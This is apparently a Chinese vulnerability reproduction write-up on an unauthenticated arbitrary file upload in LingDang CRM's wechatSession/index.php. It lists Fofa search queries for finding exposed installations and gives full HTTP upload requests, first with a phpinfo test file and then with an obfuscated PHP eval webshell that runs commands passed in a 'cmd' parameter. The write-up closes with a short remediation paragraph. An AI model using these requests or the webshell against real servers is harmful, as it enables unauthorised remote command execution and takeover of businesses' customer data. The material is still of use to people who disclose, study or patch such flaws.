灵当CRM index.php 任意文件上传漏洞复现
0x01 产品描述:
灵当CRM是一款专为中小企业量身定制的智能客户关系管理工具,由上海灵当信息科技有限公司开发和运营。该系统广泛应用于多个行业,包括金融、教育、医疗、IT服务及房地产等领域,旨在满足企业对客户个性化管理的需求,从而增强市场竞争力。
灵当CRM提供了一系列解决方案,支持新客户开拓、老客户维护、销售过程管理和服务管理等多方面的功能。通过有效地识别潜在客户并制定相应的营销策略,企业能够更好地拓展业务。同时,该系统也注重客户的持续互动与反馈,提升客户忠诚度。销售过程中的监控和优化可以显著提高成交率,而完善的售后服务管理则进一步增强客户满意度。
0x02 漏洞描述:
灵当CRM 路径/wechatSession/index.php没有对用户上传的文件进行限制,导致未经身份验证的远程攻击者可上传任意文件,从而远程执行任意命令,获取服务器权限。
0x03 搜索语句:
Fofa:body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
Fofa:body="include/js/ldAjax.js"
0x04 漏洞复现:
POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpWhy
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
拼接上传路径访问:
http://your-ip/crm/storage/wechatsession/2024/10/17/1.php
php webshell
POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpWhy
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="11.php"
Content-Type: image/jpeg
<?php class Gu7288x6 { public function __construct($H7858){ @eval("/*ZN812Hsl8S*/".$H7858."/*ZN812Hsl8S*/"); }}new Gu7288x6($_REQUEST['cmd']);?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
0x05 修复建议:
首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。